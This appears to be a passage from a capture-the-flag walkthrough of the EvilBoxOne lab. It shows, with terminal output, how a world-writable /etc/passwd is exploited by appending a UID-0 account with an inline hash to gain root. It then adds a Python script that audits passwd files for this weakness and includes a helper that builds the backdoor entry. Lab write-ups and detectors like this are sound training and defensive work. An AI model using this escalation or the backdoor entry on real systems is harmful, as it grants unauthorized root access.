-rw-rw-rw- 1 root root 1,4K ago 16  2021 /etc/passwd

Everyone has read and write access.

So a new account with UID 0 can simply be appended. Generate a SHA-512 crypt hash for its password on Kali (the hash goes straight into the second field of the passwd entry, so /etc/shadow is never consulted for this user):

┌──(kali㉿kali)-[~]
└─$ mkpasswd -m sha-512
Password: 
$6$vKLGW5G4kKFfAFQL$e7Sr6jGf6BnnVqTnN/xapZvM6mXw0opslfTElZyAi5lh/DcuRgv25eRaMzrVOLyulnEkACKAO4oVgMjDh4S6Q1

mowree@EvilBoxOne:/tmp$ vi /etc/passwd
mowree@EvilBoxOne:/tmp$ tail -1 /etc/passwd
kali:$6$vKLGW5G4kKFfAFQL$e7Sr6jGf6BnnVqTnN/xapZvM6mXw0opslfTElZyAi5lh/DcuRgv25eRaMzrVOLyulnEkACKAO4oVgMjDh4S6Q1:0:0:root:/root:/bin/bash
mowree@EvilBoxOne:/tmp$ su - kali
Contraseña: 
root@EvilBoxOne:~# id
uid=0(root) gid=0(root) grupos=0(root)
root@EvilBoxOne:~# cd /root
root@EvilBoxOne:~# ls -alh
total 24K
drwx------  3 root root 4,0K ago 16  2021 .
drwxr-xr-x 18 root root 4,0K ago 16  2021 ..
lrwxrwxrwx  1 root root    9 ago 16  2021 .bash_history -> /dev/null
-rw-r--r--  1 root root 3,5K ago 16  2021 .bashrc
drwxr-xr-x  3 root root 4,0K ago 16  2021 .local
-rw-r--r--  1 root root  148 ago 17  2015 .profile
-r--------  1 root root   31 ago 16  2021 root.txt
root@EvilBoxOne:~# cat root.txt
36QtXfdJWvdC0VavlPIApUbDlqTsBM
root@EvilBoxOne:~# 
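As an added example (not code from the original post), the script below audits an /etc/passwd for exactly the two conditions abused above: a world- or group-writable mode, and a non-root account with UID 0 that carries its hash inline instead of an `x`. It also contains the one-line helper that builds such an entry. `SAMPLE` and `SAMPLE_MODE` are constructed to mirror the box's state after the edit (the hash is the one generated above); nothing touches the real /etc/passwd unless `audit_passwd_file()` is called explicitly.

```python
"""Added example, not from the original post: audit /etc/passwd for a writable
mode and for uid-0 / inline-hash entries, i.e. the weakness used on this box.
SAMPLE and SAMPLE_MODE are constructed test data mirroring the box's state."""
import os
import stat
from dataclasses import dataclass
from typing import List

# Second-field values that mean "no hash stored here" (shadowed or locked).
LOCKED_OR_SHADOWED = {"x", "*", "!", "!!"}


@dataclass
class Finding:
    kind: str
    detail: str


def root_equivalent_entry(name: str, crypt_hash: str) -> str:
    """The line appended in the walkthrough: uid 0 / gid 0, hash inline."""
    return f"{name}:{crypt_hash}:0:0:root:/root:/bin/bash"


def audit_passwd_text(text: str) -> List[Finding]:
    """Flag malformed records, empty passwords, inline hashes and uid-0 aliases."""
    findings: List[Finding] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(Finding("malformed", f"line {lineno}: {line!r}"))
            continue
        name, pw, uid, _gid, _gecos, _home, shell = fields
        if pw == "":
            findings.append(Finding("empty_password", f"{name} can log in without a password"))
        elif pw not in LOCKED_OR_SHADOWED:
            findings.append(Finding("inline_hash", f"{name} keeps its hash in passwd, bypassing /etc/shadow"))
        if uid == "0" and name != "root":
            findings.append(Finding("uid0_alias", f"{name} has uid 0 with shell {shell}"))
    return findings


def audit_passwd_mode(st_mode: int) -> List[Finding]:
    """World-writable is the finding on this box; group-writable is reported too."""
    perm = stat.S_IMODE(st_mode)
    if perm & stat.S_IWOTH:
        return [Finding("world_writable", oct(perm))]
    if perm & stat.S_IWGRP:
        return [Finding("group_writable", oct(perm))]
    return []


def audit_passwd_file(path: str = "/etc/passwd") -> List[Finding]:
    """Run both checks against a real file (only when called explicitly)."""
    with open(path) as fh:
        text = fh.read()
    return audit_passwd_mode(os.stat(path).st_mode) + audit_passwd_text(text)


# Constructed sample: the box's passwd after the "kali" line was appended.
SAMPLE_HASH = ("$6$vKLGW5G4kKFfAFQL$e7Sr6jGf6BnnVqTnN/xapZvM6mXw0opslfTElZyAi5lh/"
               "DcuRgv25eRaMzrVOLyulnEkACKAO4oVgMjDh4S6Q1")
SAMPLE = "\n".join([
    "root:x:0:0:root:/root:/bin/bash",
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin",
    "mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash",
    root_equivalent_entry("kali", SAMPLE_HASH),
]) + "\n"
SAMPLE_MODE = 0o100666  # -rw-rw-rw- root root, as `ls -alh /etc/passwd` showed


if __name__ == "__main__":
    for f in audit_passwd_mode(SAMPLE_MODE) + audit_passwd_text(SAMPLE):
        print(f"[{f.kind}] {f.detail}")
```

On the sample this reports `world_writable`, `inline_hash` and `uid0_alias`; on a healthy Debian passwd (mode 0644, every second field `x`, only root at uid 0) it reports nothing. The same three checks are what linpeas summarises as "Hashes inside passwd file?" and "Writable passwd file?", and the `uid0_alias` check is the one a detection rule should run after any write to /etc/passwd.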

posted @ 2022-11-05 20:10  Jason_huawen